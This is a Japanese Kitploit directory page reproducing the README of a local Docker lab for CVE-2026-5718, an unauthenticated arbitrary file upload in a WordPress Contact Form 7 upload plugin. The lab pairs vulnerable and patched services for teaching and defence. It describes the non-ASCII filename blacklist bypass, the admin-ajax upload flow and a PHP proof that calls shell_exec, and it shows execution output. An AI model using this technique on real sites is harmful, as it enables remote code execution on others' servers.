Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-5718-Lab — CVE-2026-5718のWordPressプラグインにおける任意のファイルアップロードを実証するローカルDockerラボ。脆弱なサービスとパッチ適用済みのサービスを並べて、攻撃と防御の分析をside-by-sideで行えます。 | Kitploit
ツール/GitHubGitHub/rootdirective-sec/cve-2026-5718-lab
脆弱性分析エクスプロイトウェブアプリケーション悪用CTF学習と教育ラボと実践
GitHubrootdirective-sec/cve-2026-5718-lab

CVE-2026-5718-Lab

CVE-2026-5718のWordPressプラグインにおける任意のファイルアップロードを実証するローカルDockerラボ。脆弱なサービスとパッチ適用済みのサービスを並べて、攻撃と防御の分析をside-by-sideで行えます。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
13ヶ月前未レビュー

CVE-2026-5718 ローカル Docker ラボ

ローカル専用の脆弱性版・修正版 Docker ラボで CVE-2026-5718 を扱います。この脆弱性は WordPress プラグイン Drag and Drop Multiple File Upload for Contact Form 7 に影響します。

このラボでは、脆弱性バージョン 1.3.9.6 と修正バージョン 1.3.9.7 の違いを、Docker 環境内でのみ動作する最小限の害の PHP 実行プルーフを用いて示します。

スコープ: localhost / Docker ネットワークのみ。この PoC を、自分が所有していない、または明示的なテスト許可を得ていないシステムに対して使用しないでください。


概要

CVE-2026-5718 は、Drag and Drop Multiple File Upload for Contact Form 7 のバージョン 1.3.9.6 以前における任意ファイルアップロードの脆弱性です。

この問題は、カスタムブラックリストタイプが設定され、ファイル名に非 ASCII 文字が含まれている場合に発生します。脆弱性バージョンでは、危険な .php アップロードが意図された保護を回避し、実行可能な状態で保存されます。バージョン 1.3.9.7 では、同一のアップロードを拒否することで問題を修正しています。

このリポジトリは、2つのローカル WordPress サービスを実行します。

  • vuln (脆弱性版) → http://localhost:8081、プラグインバージョン 1.3.9.6
  • patched (修正版) → http://localhost:8082、プラグインバージョン 1.3.9.7

ラボアーキテクチャ

root@kitploit:~
Host
├── http://localhost:8081  -> 脆弱なWordPressサービス
└── http://localhost:8082  -> 修正済みWordPressサービス

Docker network
├── vuln
├── vuln-db
├── patched
└── patched-db

リポジトリ構造

root@kitploit:~
.
├── docker-compose.yml
├── patched
│   └── Dockerfile
├── poc
│   └── poc.py
│   └── requirements.txt
├── scripts
│   └── seed-wordpress.sh
├── vuln
│   └── Dockerfile

脆弱性フロー

シードされた Contact Form 7 フォームには、Drag and Drop Multiple File Upload フィールドが含まれています。

root@kitploit:~
[mfile upload-file filetypes:* blacklist-types:zip limit:1048576]

PoC は、次の名前の PHP プルーフファイルをアップロードします。

root@kitploit:~
proof-β.php

β 文字は非 ASCII です。これは、脆弱性が非 ASCII 入力のファイル名処理に依存しているため重要です。

高レベルの流れ:

root@kitploit:~
PoC
 ↓
ラボページを取得し、DnD CF7 AJAX nonce を抽出
 ↓
wp-admin/admin-ajax.php 経由で proof-β.php をアップロード
 ↓
脆弱性バージョン 1.3.9.6 がアップロードを受け入れ、.php として保存
 ↓
PoC がアップロードされたファイルをリクエスト
 ↓
脆弱性ラボが PHP プルーフを www-data として実行

修正版の流れ:

root@kitploit:~
PoC
 ↓
同一の proof-β.php ファイルをアップロード
 ↓
修正版 1.3.9.7 がアップロードを拒否
 ↓
PHP ファイルは保存されず、コード実行は発生しない

ローカル RCE プルーフの設計

アップロードされる PHP プルーフは意図的に最小限にしています。

root@kitploit:~
<?php
header('Content-Type: text/plain');
echo "CVE_2026_5718_LOCAL_RCE_PROOF\n";
echo "whoami=" . trim(shell_exec('whoami')) . "\n";
echo "id=" . trim(shell_exec('id')) . "\n";
?>

プルーフは whoami と id のみを実行し、実行コンテキストを示します。リバースシェル、永続化、資格情報へのアクセス、ラテラルムーブメント、ネットワークスキャン、破壊的な操作は行いません。

脆弱性サービスは、プラグインのアップロードディレクトリでの PHP 実行を意図的に許可しており、このローカルラボで影響を観察できるようにしています。修正版サービスはより安全な動作を維持し、アプリケーションの検証レイヤーでアップロードを拒否します。


必要条件

  • Docker Desktop
  • Docker Compose v2
  • Python 3

Python 依存関係のインストール:

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate
pip install -r poc/requirements.txt

ビルドと実行

クリーンな状態から開始:

root@kitploit:~
docker compose down -v
docker compose up --build -d

サービス状態の確認:

root@kitploit:~
docker compose ps

ラボページを開く:

root@kitploit:~
http://localhost:8081/cve-2026-5718-lab/
http://localhost:8082/cve-2026-5718-lab/

PoC の実行

脆弱性サービスに対して実行:

root@kitploit:~
python poc/poc.py --base-url http://localhost:8081

修正済みサービスに対して実行:

root@kitploit:~
python poc/poc.py --base-url http://localhost:8082

PoC は localhost またはループバックターゲットのみを受け入れます。


期待される結果

脆弱なサービス

期待される動作:

  • アップロードが受け入れられる。
  • アップロードされたファイル名は .php ファイルのままである。
  • アップロードされた PHP プルーフが Web サーバーユーザーとして実行される。

出力例:

root@kitploit:~
Upload response:
{"success":true,"data":{"path":"cve5718proof","file":"proof-\u03b2.php"}}

Proof response:
CVE_2026_5718_LOCAL_RCE_PROOF
whoami=www-data
id=uid=33(www-data) gid=33(www-data) groups=33(www-data)

[result] VULNERABLE behavior observed: uploaded PHP proof executed.

修正済みサービス

期待される動作:

  • 同じアップロードが拒否される。
  • PHP プルーフは実行可能ファイルとして保存されない。
  • コード実行は発生しない。

出力例:

root@kitploit:~
Upload response:
{"success":false,"data":"Uploaded file is not allowed for file type"}

[result] Upload rejected by the application.
[result] Reason: Uploaded file is not allowed for file type

安全上の注意

このラボは意図的にローカルテストに限定されています。

PoC:

  • 非 localhost ターゲットをブロックする。
  • リバースシェルを使用しない。
  • 永続化を行わない。
  • シークレットを読み取らない。
  • ネットワークをスキャンしない。
  • 脆弱なコンテナ内で whoami と id のみを実行する。

脆弱性サービスは、ローカルプルーフを観察可能にする目的でのみ、アップロードディレクトリでの PHP 実行を緩和しています。その設定を本番環境にコピーしないでください。


クリーンアップ

コンテナの停止:

root@kitploit:~
docker compose down

コンテナとボリュームの削除:

root@kitploit:~
docker compose down -v

Python 仮想環境の削除:

root@kitploit:~
rm -rf .venv

参考文献

  • NVD: CVE-2026-5718 https://nvd.nist.gov/vuln/detail/CVE-2026-5718

  • Patchstack アドバイザリ: WordPress Drag and Drop Multiple File Upload for Contact Form 7 プラグイン <= 1.3.9.6 - 非ASCIIファイル名ブラックリストバイパスによる認証なし任意ファイルアップロード https://patchstack.com/database/wordpress/plugin/drag-and-drop-multiple-file-upload-contact-form-7/vulnerability/wordpress-drag-and-drop-multiple-file-upload-for-contact-form-7-plugin-1-3-9-6-unauthenticated-arbitrary-file-upload-via-non-ascii-filename-blacklist-bypass-vulnerability

  • Wordfence Intelligence: Drag and Drop Multiple File Upload for Contact Form 7 <= 1.3.9.6 - 非ASCIIファイル名ブラックリストバイパスによる認証なし任意ファイルアップロード https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/drag-and-drop-multiple-file-upload-contact-form-7/drag-and-drop-multiple-file-upload-for-contact-form-7-1396-unauthenticated-arbitrary-file-upload-via-non-ascii-filename-blacklist-bypass

  • GitHub Advisory Database: GHSA-xj7v-jqv6-v48w https://github.com/advisories/GHSA-xj7v-jqv6-v48w

  • WordPress.org プラグインページ: Drag and Drop Multiple File Upload for Contact Form 7 https://wordpress.org/plugins/drag-and-drop-multiple-file-upload-contact-form-7/

  • プラグインベンダーページ: Drag & Drop Multiple File Upload for Contact Form 7 https://www.codedropz.com/drag-drop-multiple-file-upload-for-contact-form-7/


免責事項

このリポジトリは教育および防御的なセキュリティ研究のみを目的としています。Docker を使用した localhost でのみ実行するように設計されています。PoC を公開システムやサードパーティのシステムに対して使用しないでください。

ツールをダウンロード
サービス目的ホストポートバージョン
vuln脆弱なWordPressラボ8081プラグイン 1.3.9.6
patched修正済みWordPressラボ8082プラグイン 1.3.9.7
vuln-db脆弱なサービス用MySQLデータベース内部MySQL 8.0
patched-db修正済みサービス用MySQLデータベース内部MySQL 8.0